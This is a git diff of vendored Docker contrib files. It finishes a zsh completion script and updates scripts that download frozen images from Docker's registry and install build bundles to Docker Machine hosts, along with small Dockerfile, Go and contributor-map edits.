"($help)--seccomp-profile=[Path to seccomp profile]:path:_files -g \"*.json\"" \ - "($help -s --storage-driver)"{-s=,--storage-driver=}"[Storage driver to use]:driver:(aufs btrfs devicemapper overlay overlay2 vfs zfs)" \ - "($help)--selinux-enabled[Enable selinux support]" \ - "($help)--shutdown-timeout=[Set the shutdown timeout value in seconds]:time: " \ - "($help)*--storage-opt=[Storage driver options]:storage driver options: " \ - "($help)--tls[Use TLS]" \ - "($help)--tlscacert=[Trust certs signed only by this CA]:PEM file:_files -g \"*.(pem|crt)\"" \ - "($help)--tlscert=[Path to TLS certificate file]:PEM file:_files -g \"*.(pem|crt)\"" \ - "($help)--tlskey=[Path to TLS key file]:Key file:_files -g \"*.(pem|key)\"" \ - "($help)--tlsverify[Use TLS and verify the remote]" \ - "($help)--userns-remap=[User/Group setting for user namespaces]:user\:group:->users-groups" \ - "($help)--userland-proxy[Use userland proxy for loopback traffic]" \ - "($help)--userland-proxy-path=[Path to the userland proxy binary]:binary:_files" && ret=0 - - case $state in - (cluster-store) - if compset -P '*://'; then - _message 'host:port' && ret=0 - else - store=('consul' 'etcd' 'zk') - _describe -t cluster-store "Cluster Store" store -qS "://" && ret=0 - fi - ;; - (cluster-store-options) - if compset -P '*='; then - _files && ret=0 - else - opts=('discovery.heartbeat' 'discovery.ttl' 'kv.cacertfile' 'kv.certfile' 'kv.keyfile' 'kv.path') - _describe -t cluster-store-opts "Cluster Store Options" opts -qS "=" && ret=0 - fi - ;; - (users-groups) - if compset -P '*:'; then - _groups && ret=0 - else - _describe -t userns-default "default Docker user management" '(default)' && ret=0 - _users && ret=0 - fi - ;; - esac - ;; - (events|info) - __docker_system_subcommand && ret=0 - ;; - (image) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - 
__docker_image_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_image_subcommand && ret=0 - ;; - esac - ;; - (images) - words[1]='ls' - __docker_image_subcommand && ret=0 - ;; - (inspect) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help -s --size)"{-s,--size}"[Display total file sizes if the type is container]" \ - "($help)--type=[Return JSON for specified type]:type:(container image network node plugin service volume)" \ - "($help -)*: :->values" && ret=0 - - case $state in - (values) - if [[ ${words[(r)--type=container]} == --type=container ]]; then - __docker_complete_containers && ret=0 - elif [[ ${words[(r)--type=image]} == --type=image ]]; then - __docker_complete_images && ret=0 - elif [[ ${words[(r)--type=network]} == --type=network ]]; then - __docker_complete_networks && ret=0 - elif [[ ${words[(r)--type=node]} == --type=node ]]; then - __docker_complete_nodes && ret=0 - elif [[ ${words[(r)--type=plugin]} == --type=plugin ]]; then - __docker_complete_plugins && ret=0 - elif [[ ${words[(r)--type=service]} == --type=service ]]; then - __docker_complete_services && ret=0 - elif [[ ${words[(r)--type=volume]} == --type=volume ]]; then - __docker_complete_volumes && ret=0 - else - __docker_complete_containers - __docker_complete_images - __docker_complete_networks - __docker_complete_nodes - __docker_complete_plugins - __docker_complete_services - __docker_complete_volumes && ret=0 - fi - ;; - esac - ;; - (login) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help -p --password)"{-p=,--password=}"[Password]:password: " \ - "($help -u --user)"{-u=,--user=}"[Username]:username: " \ - "($help -)1:server: " && ret=0 - ;; - (logout) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help -)1:server: " && ret=0 - ;; - (network) - local 
curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_network_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_network_subcommand && ret=0 - ;; - esac - ;; - (node) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_node_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_node_subcommand && ret=0 - ;; - esac - ;; - (plugin) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_plugin_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_plugin_subcommand && ret=0 - ;; - esac - ;; - (ps) - words[1]='ls' - __docker_container_subcommand && ret=0 - ;; - (rmi) - words[1]='rm' - __docker_image_subcommand && ret=0 - ;; - (search) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Filter values]:filter:->filter-options" \ - "($help)--limit=[Maximum returned search results]:limit:(1 5 10 25 50)" \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -):term: " && ret=0 - - case $state in - (filter-options) - __docker_complete_search_filters && ret=0 - ;; - esac - ;; - (secret) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_secret_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - 
__docker_secret_subcommand && ret=0 - ;; - esac - ;; - (service) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_service_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_service_subcommand && ret=0 - ;; - esac - ;; - (stack) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_stack_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_stack_subcommand && ret=0 - ;; - esac - ;; - (swarm) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_swarm_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_swarm_subcommand && ret=0 - ;; - esac - ;; - (system) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_system_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_system_subcommand && ret=0 - ;; - esac - ;; - (version) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " && ret=0 - ;; - (volume) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_volume_commands && ret=0 - 
;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_volume_subcommand && ret=0 - ;; - esac - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_commands" && ret=0 - ;; - esac - - return ret -} - -_docker() { - # Support for subservices, which allows for `compdef _docker docker-shell=_docker_containers`. - # Based on /usr/share/zsh/functions/Completion/Unix/_git without support for `ret`. - if [[ $service != docker ]]; then - _call_function - _$service - return - fi - - local curcontext="$curcontext" state line help="-h --help" - integer ret=1 - typeset -A opt_args - - _arguments $(__docker_arguments) -C \ - "(: -)"{-h,--help}"[Print usage]" \ - "($help)--config[Location of client config files]:path:_directories" \ - "($help -D --debug)"{-D,--debug}"[Enable debug mode]" \ - "($help -H --host)"{-H=,--host=}"[tcp://host:port to bind/connect to]:host: " \ - "($help -l --log-level)"{-l=,--log-level=}"[Logging level]:level:(debug info warn error fatal)" \ - "($help)--tls[Use TLS]" \ - "($help)--tlscacert=[Trust certs signed only by this CA]:PEM file:_files -g "*.(pem|crt)"" \ - "($help)--tlscert=[Path to TLS certificate file]:PEM file:_files -g "*.(pem|crt)"" \ - "($help)--tlskey=[Path to TLS key file]:Key file:_files -g "*.(pem|key)"" \ - "($help)--tlsverify[Use TLS and verify the remote]" \ - "($help)--userland-proxy[Use userland proxy for loopback traffic]" \ - "($help -v --version)"{-v,--version}"[Print version information and quit]" \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - local host=${opt_args[-H]}${opt_args[--host]} - local config=${opt_args[--config]} - local docker_options="${host:+--host $host} ${config:+--config $config}" - - case $state in - (command) - __docker_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-$words[1]: - __docker_subcommand && ret=0 - ;; - esac - - return ret -} - -_dockerd() { - integer ret=1 - 
words[1]='daemon' - __docker_subcommand && ret=0 - return ret -} - -_docker "$@" - -# Local Variables: -# mode: Shell-Script -# sh-indentation: 4 -# indent-tabs-mode: nil -# sh-basic-offset: 4 -# End: -# vim: ft=zsh sw=4 ts=4 et diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile b/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile index 5cacd1f999..187281644f 100644 --- a/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile +++ b/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile @@ -22,7 +22,7 @@ # Base docker image FROM debian:jessie -MAINTAINER Jessica Frazelle +LABEL maintainer Jessica Frazelle # Install Chromium RUN apt-get update && apt-get install -y \ diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile b/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile index 3ddb23208d..8a9b646ee4 100644 --- a/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile +++ b/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile @@ -19,7 +19,7 @@ # Base docker image FROM debian:jessie -MAINTAINER Jessica Frazelle +LABEL maintainer Jessica Frazelle # Install Gparted and its dependencies RUN apt-get update && apt-get install -y \ diff --git a/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go index 906d064df6..d3ec46a8b4 100644 --- a/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go +++ b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go @@ -1,4 +1,4 @@ -// +build !windows,!solaris +// +build !windows package main @@ -11,9 +11,9 @@ import ( "strconv" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver/devmapper" "github.com/docker/docker/pkg/devicemapper" + 
"github.com/sirupsen/logrus" ) func usage() { @@ -90,14 +90,12 @@ func main() { fmt.Printf("Sector size: %d\n", status.SectorSize) fmt.Printf("Data use: %d of %d (%.1f %%)\n", status.Data.Used, status.Data.Total, 100.0*float64(status.Data.Used)/float64(status.Data.Total)) fmt.Printf("Metadata use: %d of %d (%.1f %%)\n", status.Metadata.Used, status.Metadata.Total, 100.0*float64(status.Metadata.Used)/float64(status.Metadata.Total)) - break case "list": ids := devices.List() sort.Strings(ids) for _, id := range ids { fmt.Println(id) } - break case "device": if flag.NArg() < 2 { usage() @@ -113,7 +111,6 @@ func main() { fmt.Printf("Size in Sectors: %d\n", status.SizeInSectors) fmt.Printf("Mapped Sectors: %d\n", status.MappedSectors) fmt.Printf("Highest Mapped Sector: %d\n", status.HighestMappedSector) - break case "resize": if flag.NArg() < 2 { usage() @@ -131,7 +128,6 @@ func main() { os.Exit(1) } - break case "snap": if flag.NArg() < 3 { usage() @@ -142,7 +138,6 @@ func main() { fmt.Println("Can't create snap device: ", err) os.Exit(1) } - break case "remove": if flag.NArg() < 2 { usage() @@ -153,7 +148,6 @@ func main() { fmt.Println("Can't remove device: ", err) os.Exit(1) } - break case "mount": if flag.NArg() < 3 { usage() @@ -161,16 +155,13 @@ func main() { err := devices.MountDevice(args[1], args[2], "") if err != nil { - fmt.Println("Can't create snap device: ", err) + fmt.Println("Can't mount device: ", err) os.Exit(1) } - break default: fmt.Printf("Unknown command %s\n", args[0]) usage() os.Exit(1) } - - return } diff --git a/vendor/github.com/docker/docker/contrib/docker-machine-install-bundle.sh b/vendor/github.com/docker/docker/contrib/docker-machine-install-bundle.sh new file mode 100755 index 0000000000..860598943b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/docker-machine-install-bundle.sh @@ -0,0 +1,111 @@ +#!/usr/bin/env bash +# +# This script installs the bundle to Docker Machine instances, for the purpose +# of testing the latest 
Docker with Swarm mode enabled. +# Do not use in production. +# +# Requirements (on host to run this script) +# - bash is installed +# - Docker Machine is installed +# - GNU tar is installed +# +# Requirements (on Docker machine instances) +# - Docker can be managed via one of `systemctl`, `service`, or `/etc/init.d/docker` +# +set -e +set -o pipefail + +errexit() { + echo "$1" + exit 1 +} + +BUNDLE="bundles/$(cat VERSION)" + +bundle_files(){ + # prefer dynbinary if exists + for f in dockerd docker-proxy; do + if [ -d $BUNDLE/dynbinary-daemon ]; then + echo $BUNDLE/dynbinary-daemon/$f + else + echo $BUNDLE/binary-daemon/$f + fi + done + for f in docker-containerd docker-containerd-ctr docker-containerd-shim docker-init docker-runc; do + echo $BUNDLE/binary-daemon/$f + done + if [ -d $BUNDLE/dynbinary-client ]; then + echo $BUNDLE/dynbinary-client/docker + else + echo $BUNDLE/binary-client/docker + fi +} + +control_docker(){ + m=$1; op=$2 + # NOTE: `docker-machine ssh $m sh -c "foo bar"` does not work + # (but `docker-machine ssh $m sh -c "foo\ bar"` works) + # Anyway we avoid using `sh -c` here for avoiding confusion + cat < /dev/null; then + systemctl $op docker +elif command -v service > /dev/null; then + service docker $op +elif [ -x /etc/init.d/docker ]; then + /etc/init.d/docker $op +else + echo "not sure how to control the docker daemon" + exit 1 +fi +EOF +} + +detect_prefix(){ + m=$1 + script='dirname $(dirname $(which dockerd))' + echo $script | docker-machine ssh $m sh +} + +install_to(){ + m=$1; shift; files=$@ + echo "$m: detecting docker" + prefix=$(detect_prefix $m) + echo "$m: detected docker on $prefix" + echo "$m: stopping docker" + control_docker $m stop + echo "$m: installing docker" + # NOTE: GNU tar is required because we use --transform here + # TODO: compression (should not be default) + tar ch --transform 's/.*\///' $files | docker-machine ssh $m sudo tar Cx $prefix/bin + echo "$m: starting docker" + control_docker $m start + echo "$m: done" 
+} + +check_prereq(){ + command -v docker-machine > /dev/null || errexit "docker-machine not installed" + ( tar --version | grep GNU > /dev/null ) || errexit "GNU tar not installed" +} + +case "$1" in + "install") + shift; machines=$@ + check_prereq + files=$(bundle_files) + echo "Files to be installed:" + for f in $files; do echo $f; done + pids=() + for m in $machines; do + install_to $m $files & + pids+=($!) + done + status=0 + for pid in ${pids[@]}; do + wait $pid || { status=$?; echo "background process $pid failed with exit status $status"; } + done + exit $status + ;; + *) + errexit "Usage: $0 install MACHINES" + ;; +esac diff --git a/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh b/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh index 29d7ff59fd..77c91d1f1b 100755 --- a/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh +++ b/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e # hello-world latest ef872312fe1b 3 months ago 910 B diff --git a/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh b/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh index 111e3fa2ba..54b592307f 100755 --- a/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh +++ b/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh @@ -1,16 +1,19 @@ -#!/bin/bash -set -e +#!/usr/bin/env bash +set -eo pipefail # hello-world latest ef872312fe1b 3 months ago 910 B # hello-world latest ef872312fe1bbc5e05aae626791a47ee9b032efa8f3bda39cc0be7b56bfe59b9 3 months ago 910 B # debian latest f6fab3b798be 10 weeks ago 85.1 MB # debian latest f6fab3b798be3174f45aa1eb731f8182705555f89c9026d8c1ef230cbf8301dd 10 weeks ago 85.1 MB - if ! command -v curl &> /dev/null; then echo >&2 'error: "curl" not found!' exit 1 fi +if ! command -v jq &> /dev/null; then + echo >&2 'error: "jq" not found!' 
+ exit 1 +fi usage() { echo "usage: $0 dir image[:tag][@digest] ..." @@ -27,8 +30,158 @@ mkdir -p "$dir" # hacky workarounds for Bash 3 support (no associative arrays) images=() rm -f "$dir"/tags-*.tmp +manifestJsonEntries=() +doNotGenerateManifestJson= # repositories[busybox]='"latest": "...", "ubuntu-14.04": "..."' +# bash v4 on Windows CI requires CRLF separator +newlineIFS=$'\n' +if [ "$(go env GOHOSTOS)" = 'windows' ]; then + major=$(echo ${BASH_VERSION%%[^0.9]} | cut -d. -f1) + if [ "$major" -ge 4 ]; then + newlineIFS=$'\r\n' + fi +fi + +registryBase='https://registry-1.docker.io' +authBase='https://auth.docker.io' +authService='registry.docker.io' + +# https://github.com/moby/moby/issues/33700 +fetch_blob() { + local token="$1"; shift + local image="$1"; shift + local digest="$1"; shift + local targetFile="$1"; shift + local curlArgs=( "$@" ) + + local curlHeaders="$( + curl -S "${curlArgs[@]}" \ + -H "Authorization: Bearer $token" \ + "$registryBase/v2/$image/blobs/$digest" \ + -o "$targetFile" \ + -D- + )" + curlHeaders="$(echo "$curlHeaders" | tr -d '\r')" + if grep -qE "^HTTP/[0-9].[0-9] 3" <<<"$curlHeaders"; then + rm -f "$targetFile" + + local blobRedirect="$(echo "$curlHeaders" | awk -F ': ' 'tolower($1) == "location" { print $2; exit }')" + if [ -z "$blobRedirect" ]; then + echo >&2 "error: failed fetching '$image' blob '$digest'" + echo "$curlHeaders" | head -1 >&2 + return 1 + fi + + curl -fSL "${curlArgs[@]}" \ + "$blobRedirect" \ + -o "$targetFile" + fi +} + +# handle 'application/vnd.docker.distribution.manifest.v2+json' manifest +handle_single_manifest_v2() { + local manifestJson="$1"; shift + + local configDigest="$(echo "$manifestJson" | jq --raw-output '.config.digest')" + local imageId="${configDigest#*:}" # strip off "sha256:" + + local configFile="$imageId.json" + fetch_blob "$token" "$image" "$configDigest" "$dir/$configFile" -s + + local layersFs="$(echo "$manifestJson" | jq --raw-output --compact-output '.layers[]')" + local 
IFS="$newlineIFS" + local layers=( $layersFs ) + unset IFS + + echo "Downloading '$imageIdentifier' (${#layers[@]} layers)..." + local layerId= + local layerFiles=() + for i in "${!layers[@]}"; do + local layerMeta="${layers[$i]}" + + local layerMediaType="$(echo "$layerMeta" | jq --raw-output '.mediaType')" + local layerDigest="$(echo "$layerMeta" | jq --raw-output '.digest')" + + # save the previous layer's ID + local parentId="$layerId" + # create a new fake layer ID based on this layer's digest and the previous layer's fake ID + layerId="$(echo "$parentId"$'\n'"$layerDigest" | sha256sum | cut -d' ' -f1)" + # this accounts for the possibility that an image contains the same layer twice (and thus has a duplicate digest value) + + mkdir -p "$dir/$layerId" + echo '1.0' > "$dir/$layerId/VERSION" + + if [ ! -s "$dir/$layerId/json" ]; then + local parentJson="$(printf ', parent: "%s"' "$parentId")" + local addJson="$(printf '{ id: "%s"%s }' "$layerId" "${parentId:+$parentJson}")" + # this starter JSON is taken directly from Docker's own "docker save" output for unimportant layers + jq "$addJson + ." > "$dir/$layerId/json" <<-'EOJSON' + { + "created": "0001-01-01T00:00:00Z", + "container_config": { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": false, + "AttachStderr": false, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": null, + "Image": "", + "Volumes": null, + "WorkingDir": "", + "Entrypoint": null, + "OnBuild": null, + "Labels": null + } + } + EOJSON + fi + + case "$layerMediaType" in + application/vnd.docker.image.rootfs.diff.tar.gzip) + local layerTar="$layerId/layer.tar" + layerFiles=( "${layerFiles[@]}" "$layerTar" ) + # TODO figure out why "-C -" doesn't work here + # "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume." 
+ # "HTTP/1.1 416 Requested Range Not Satisfiable" + if [ -f "$dir/$layerTar" ]; then + # TODO hackpatch for no -C support :'( + echo "skipping existing ${layerId:0:12}" + continue + fi + local token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')" + fetch_blob "$token" "$image" "$layerDigest" "$dir/$layerTar" --progress + ;; + + *) + echo >&2 "error: unknown layer mediaType ($imageIdentifier, $layerDigest): '$layerMediaType'" + exit 1 + ;; + esac + done + + # change "$imageId" to be the ID of the last layer we added (needed for old-style "repositories" file which is created later -- specifically for older Docker daemons) + imageId="$layerId" + + # munge the top layer image manifest to have the appropriate image configuration for older daemons + local imageOldConfig="$(jq --raw-output --compact-output '{ id: .id } + if .parent then { parent: .parent } else {} end' "$dir/$imageId/json")" + jq --raw-output "$imageOldConfig + del(.history, .rootfs)" "$dir/$configFile" > "$dir/$imageId/json" + + local manifestJsonEntry="$( + echo '{}' | jq --raw-output '. 
+ { + Config: "'"$configFile"'", + RepoTags: ["'"${image#library\/}:$tag"'"], + Layers: '"$(echo '[]' | jq --raw-output ".$(for layerFile in "${layerFiles[@]}"; do echo " + [ \"$layerFile\" ]"; done)")"' + }' + )" + manifestJsonEntries=( "${manifestJsonEntries[@]}" "$manifestJsonEntry" ) +} + while [ $# -gt 0 ]; do imageTag="$1" shift @@ -44,30 +197,119 @@ while [ $# -gt 0 ]; do imageFile="${image//\//_}" # "/" can't be in filenames :) - token="$(curl -sSL "https://auth.docker.io/token?service=registry.docker.io&scope=repository:$image:pull" | jq --raw-output .token)" + token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')" - manifestJson="$(curl -sSL -H "Authorization: Bearer $token" "https://registry-1.docker.io/v2/$image/manifests/$digest")" + manifestJson="$( + curl -fsSL \ + -H "Authorization: Bearer $token" \ + -H 'Accept: application/vnd.docker.distribution.manifest.v2+json' \ + -H 'Accept: application/vnd.docker.distribution.manifest.list.v2+json' \ + -H 'Accept: application/vnd.docker.distribution.manifest.v1+json' \ + "$registryBase/v2/$image/manifests/$digest" + )" if [ "${manifestJson:0:1}" != '{' ]; then echo >&2 "error: /v2/$image/manifests/$digest returned something unexpected:" echo >&2 " $manifestJson" exit 1 fi - layersFs=$(echo "$manifestJson" | jq --raw-output '.fsLayers | .[] | .blobSum') + imageIdentifier="$image:$tag@$digest" - IFS=$'\n' - # bash v4 on Windows CI requires CRLF separator - if [ "$(go env GOHOSTOS)" = 'windows' ]; then - major=$(echo ${BASH_VERSION%%[^0.9]} | cut -d. 
-f1) - if [ "$major" -ge 4 ]; then - IFS=$'\r\n' - fi - fi - layers=( ${layersFs} ) - unset IFS + schemaVersion="$(echo "$manifestJson" | jq --raw-output '.schemaVersion')" + case "$schemaVersion" in + 2) + mediaType="$(echo "$manifestJson" | jq --raw-output '.mediaType')" + + case "$mediaType" in + application/vnd.docker.distribution.manifest.v2+json) + handle_single_manifest_v2 "$manifestJson" + ;; + application/vnd.docker.distribution.manifest.list.v2+json) + layersFs="$(echo "$manifestJson" | jq --raw-output --compact-output '.manifests[]')" + IFS="$newlineIFS" + layers=( $layersFs ) + unset IFS + + found="" + # parse first level multi-arch manifest + for i in "${!layers[@]}"; do + layerMeta="${layers[$i]}" + maniArch="$(echo "$layerMeta" | jq --raw-output '.platform.architecture')" + if [ "$maniArch" = "$(go env GOARCH)" ]; then + digest="$(echo "$layerMeta" | jq --raw-output '.digest')" + # get second level single manifest + submanifestJson="$( + curl -fsSL \ + -H "Authorization: Bearer $token" \ + -H 'Accept: application/vnd.docker.distribution.manifest.v2+json' \ + -H 'Accept: application/vnd.docker.distribution.manifest.list.v2+json' \ + -H 'Accept: application/vnd.docker.distribution.manifest.v1+json' \ + "$registryBase/v2/$image/manifests/$digest" + )" + handle_single_manifest_v2 "$submanifestJson" + found="found" + break + fi + done + if [ -z "$found" ]; then + echo >&2 "error: manifest for $maniArch is not found" + exit 1 + fi + ;; + *) + echo >&2 "error: unknown manifest mediaType ($imageIdentifier): '$mediaType'" + exit 1 + ;; + esac + ;; + + 1) + if [ -z "$doNotGenerateManifestJson" ]; then + echo >&2 "warning: '$imageIdentifier' uses schemaVersion '$schemaVersion'" + echo >&2 " this script cannot (currently) recreate the 'image config' to put in a 'manifest.json' (thus any schemaVersion 2+ images will be imported in the old way, and their 'docker history' will suffer)" + echo >&2 + doNotGenerateManifestJson=1 + fi + + layersFs="$(echo 
"$manifestJson" | jq --raw-output '.fsLayers | .[] | .blobSum')" + IFS="$newlineIFS" + layers=( $layersFs ) + unset IFS + + history="$(echo "$manifestJson" | jq '.history | [.[] | .v1Compatibility]')" + imageId="$(echo "$history" | jq --raw-output '.[0]' | jq --raw-output '.id')" - history=$(echo "$manifestJson" | jq '.history | [.[] | .v1Compatibility]') - imageId=$(echo "$history" | jq --raw-output .[0] | jq --raw-output .id) + echo "Downloading '$imageIdentifier' (${#layers[@]} layers)..." + for i in "${!layers[@]}"; do + imageJson="$(echo "$history" | jq --raw-output ".[${i}]")" + layerId="$(echo "$imageJson" | jq --raw-output '.id')" + imageLayer="${layers[$i]}" + + mkdir -p "$dir/$layerId" + echo '1.0' > "$dir/$layerId/VERSION" + + echo "$imageJson" > "$dir/$layerId/json" + + # TODO figure out why "-C -" doesn't work here + # "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume." + # "HTTP/1.1 416 Requested Range Not Satisfiable" + if [ -f "$dir/$layerId/layer.tar" ]; then + # TODO hackpatch for no -C support :'( + echo "skipping existing ${layerId:0:12}" + continue + fi + token="$(curl -fsSL "$authBase/token?service=$authService&scope=repository:$image:pull" | jq --raw-output '.token')" + fetch_blob "$token" "$image" "$imageLayer" "$dir/$layerId/layer.tar" --progress + done + ;; + + *) + echo >&2 "error: unknown manifest schemaVersion ($imageIdentifier): '$schemaVersion'" + exit 1 + ;; + esac + + echo if [ -s "$dir/tags-$imageFile.tmp" ]; then echo -n ', ' >> "$dir/tags-$imageFile.tmp" @@ -75,30 +317,6 @@ while [ $# -gt 0 ]; do images=( "${images[@]}" "$image" ) fi echo -n '"'"$tag"'": "'"$imageId"'"' >> "$dir/tags-$imageFile.tmp" - - echo "Downloading '${image}:${tag}@${digest}' (${#layers[@]} layers)..." 
- for i in "${!layers[@]}"; do - imageJson=$(echo "$history" | jq --raw-output .[${i}]) - imageId=$(echo "$imageJson" | jq --raw-output .id) - imageLayer=${layers[$i]} - - mkdir -p "$dir/$imageId" - echo '1.0' > "$dir/$imageId/VERSION" - - echo "$imageJson" > "$dir/$imageId/json" - - # TODO figure out why "-C -" doesn't work here - # "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume." - # "HTTP/1.1 416 Requested Range Not Satisfiable" - if [ -f "$dir/$imageId/layer.tar" ]; then - # TODO hackpatch for no -C support :'( - echo "skipping existing ${imageId:0:12}" - continue - fi - token="$(curl -sSL "https://auth.docker.io/token?service=registry.docker.io&scope=repository:$image:pull" | jq --raw-output .token)" - curl -SL --progress -H "Authorization: Bearer $token" "https://registry-1.docker.io/v2/$image/blobs/$imageLayer" -o "$dir/$imageId/layer.tar" # -C - - done - echo done echo -n '{' > "$dir/repositories" @@ -116,6 +334,12 @@ echo -n $'\n}\n' >> "$dir/repositories" rm -f "$dir"/tags-*.tmp +if [ -z "$doNotGenerateManifestJson" ] && [ "${#manifestJsonEntries[@]}" -gt 0 ]; then + echo '[]' | jq --raw-output ".$(for entry in "${manifestJsonEntries[@]}"; do echo " + [ $entry ]"; done)" > "$dir/manifest.json" +else + rm -f "$dir/manifest.json" +fi + echo "Download of images into '$dir' complete." echo "Use something like the following to load the result into a Docker daemon:" echo " tar -cC '$dir' . 
| docker load" diff --git a/vendor/github.com/docker/docker/contrib/gitdm/domain-map b/vendor/github.com/docker/docker/contrib/gitdm/domain-map index 1f1849e4f6..17a287e97a 100644 --- a/vendor/github.com/docker/docker/contrib/gitdm/domain-map +++ b/vendor/github.com/docker/docker/contrib/gitdm/domain-map @@ -23,7 +23,14 @@ github@hollensbe.org Docker < 2015-01-01 github@hollensbe.org Cisco david.calavera@gmail.com Docker < 2016-04-01 -david.calavera@gmail.com Netlify +david.calavera@gmail.com (Unknown) + +madhu@socketplane.io Docker +ejhazlett@gmail.com Docker +ben@firshman.co.uk Docker + +vincent@sbr.pm (Unknown) < 2016-10-24 +vincent@sbr.pm Docker # # Others @@ -37,3 +44,4 @@ microsoft.com Microsoft redhat.com Red Hat mrunalp@gmail.com Red Hat +antonio.murdaca@gmail.com Red Hat diff --git a/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh b/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh index dd6a564995..dfff5ff204 100755 --- a/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh +++ b/vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # This script generates a gitdm compatible email aliases file from a git diff --git a/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris b/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris deleted file mode 100644 index 3d0d691c17..0000000000 --- a/vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris +++ /dev/null @@ -1,4 +0,0 @@ -FROM solaris 